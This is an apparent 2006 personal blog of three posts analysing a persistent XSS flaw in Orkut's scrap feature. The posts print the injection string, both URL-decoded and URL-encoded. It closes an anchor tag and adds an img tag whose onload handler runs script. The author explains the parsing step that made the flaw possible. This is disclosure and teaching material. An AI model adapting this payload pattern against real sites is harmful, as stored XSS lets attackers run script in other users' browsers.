Tuesday, October 10, 2006

My interpretation - Orkut vector

Interpretation of this page with this injection string.


Orkut user entered scrap text as
www.orkut.com/"gt;lt;/a><img src="http://www.bandeirasanimadas.com/Asia/India/3dflagsdotcom_india_2fawm.gif" onload=alert(1)><a style="display:none" href="
Let's greet the independence of India. CHEERS!

Look at the string BEFORE "Let's greet the independence of India. CHEERS!"
Lets call it $USER_LINK

The string does not have any newline or any character of that kind. (Remember, actual injection string was URL encoded. I have given url decoded string here for convenience)

1. $USER_LINK is parsed by orkut server and it thinks that its a link.
2. Thus it puts it under <a href="$USER_LINK">whatever</a>
3. Rest of the text after newline is kept as is.
4. Effectively, user gets following,

<a href= "www.orkut.com/"></a><img src="http://www.bandeirasanimadas.com/Asia/India/3dflagsdotcom_india_2fawm.gif" onload=alert(1)><a style="display:none" href=" " >whatever</a>
Let's greet the independence of India. CHEERS!


Effectively you got into HTML and that was it!

Hope this makes sense. Sorry for not having the real HTML. They fixed it before I could save the html.


BTW, this was how I could find XSS WITHOUT really attacking orkut. I know I should not be attacking them without their permission and they wont give anybody this permission anyway [:d]

Posted by Kishor at 10:47 PM 0 comments

Monday, October 09, 2006

URL decoded version

www.orkut.com/"></a><img
src="http://www.bandeirasanimadas.com/Asia/India/3dflagsdotcom_india_2fawm.gif" onload=alert(1)><a style="display:none" href="
Let's greet the independence of India. CHEERS!

Posted by Kishor at 11:18 PM 0 comments

Friday, October 06, 2006









Orkut XSS - silently fixed!



On the 14th August , I got a scrap from my friend wishing me happy independence day (15 th).
I noticed one interesting thing, I could see image of Indian flag along with the scrap.

I quickly realized that something was wrong. Same scraps were floating around all over orkut that day. After modifying scrap text a little, I could verify that XSS did infact exist.

When I opened my scrap book that night, I couldn't see images any more. Had the scrap not spread on such a large scale, this XSS would have remained unnoticed I believe.

What concerned me was that this XSS was of persistent type!

Scrap Text that was used to verify this ->

www.orkut.com/%22%3e%3c/a%3e%3Cimg%20src%3D%22http%3A//www.bandeirasanimadas.com/Asia/India/3dflagsdotcom_india_2fawm.gif%22%20onload%3Dalert%281%29%3E%3Ca%20style%3D%22display%3Anone%22%20href%3D%22
Let's greet the independence of India. CHEERS!

Posted by Kishor at 10:51 AM 0 comments
Subscribe to: Posts (Atom)